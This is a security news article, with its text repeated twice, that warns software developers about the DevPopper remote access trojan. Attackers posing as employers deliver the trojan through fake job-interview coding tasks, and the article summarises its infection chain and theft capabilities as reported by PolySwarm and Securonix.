No developer is immune to the persuasive methods of hackers.
Recently, researchers from PolySwarm have documented several cases of sophisticated cyberattacks with social engineering techniques aimed at software developers. Scammers use fake job interviews to install malware known as DevPopper. This tool is a Python-based Remote Access Trojan (RAT) that is capable of infiltrating devices on a variety of operating systems, including Linux, Windows, and MacOS.
Attackers disguise themselves as employers interviewing for developer positions. In fake interviews, candidates are asked to complete technical tasks, such as downloading and running code from GitHub. In this way, victims unwittingly download malware onto their devices, giving the crooks remote access to the system.
After downloading the file containing the NPM package, an encrypted JavaScript file is run that executes "curl" commands through the Node.js. This leads to the download of a second archive containing the next stage of the malware - the DevPopper RAT script in Python.
DevPopper collects device information, such as operating system type, hostname, and network data, and sends this information to a management server (C2). DevPopper features include network session creation, data encoding, support for persistent connections for remote control, file system search and file theft, remote command execution (RCE) to deploy additional exploits or malware, clipboard logging, and keystroke logging.
Recently, Securonix, which first detected this malicious activity in April of this year, reported that the threat actors behind DevPopper have improved their methods and tools (TTP). They now target devices running not only Linux but also Windows and MacOS.
In addition, new malware variants have been added to the campaign. The updated DevPopper has advanced features, including improved FTP functionality, support for encrypted data transfer, and the ability to steal stored credentials and session cookies from popular browsers.
Most likely, this campaign is the work of North Korean hackers, as it has similar features to previous attacks originating from the DPRK. Users in South Korea, North America, Europe and the Middle East have already become victims.
For those IT professionals who work in the field of software development, this information is a wake-up call that underscores the importance of caution when interacting with potential employers online.
Source
Recently, researchers from PolySwarm have documented several cases of sophisticated cyberattacks with social engineering techniques aimed at software developers. Scammers use fake job interviews to install malware known as DevPopper. This tool is a Python-based Remote Access Trojan (RAT) that is capable of infiltrating devices on a variety of operating systems, including Linux, Windows, and MacOS.
Attackers disguise themselves as employers interviewing for developer positions. In fake interviews, candidates are asked to complete technical tasks, such as downloading and running code from GitHub. In this way, victims unwittingly download malware onto their devices, giving the crooks remote access to the system.
After downloading the file containing the NPM package, an encrypted JavaScript file is run that executes "curl" commands through the Node.js. This leads to the download of a second archive containing the next stage of the malware - the DevPopper RAT script in Python.
DevPopper collects device information, such as operating system type, hostname, and network data, and sends this information to a management server (C2). DevPopper features include network session creation, data encoding, support for persistent connections for remote control, file system search and file theft, remote command execution (RCE) to deploy additional exploits or malware, clipboard logging, and keystroke logging.
Recently, Securonix, which first detected this malicious activity in April of this year, reported that the threat actors behind DevPopper have improved their methods and tools (TTP). They now target devices running not only Linux but also Windows and MacOS.
In addition, new malware variants have been added to the campaign. The updated DevPopper has advanced features, including improved FTP functionality, support for encrypted data transfer, and the ability to steal stored credentials and session cookies from popular browsers.
Most likely, this campaign is the work of North Korean hackers, as it has similar features to previous attacks originating from the DPRK. Users in South Korea, North America, Europe and the Middle East have already become victims.
For those IT professionals who work in the field of software development, this information is a wake-up call that underscores the importance of caution when interacting with potential employers online.
Source
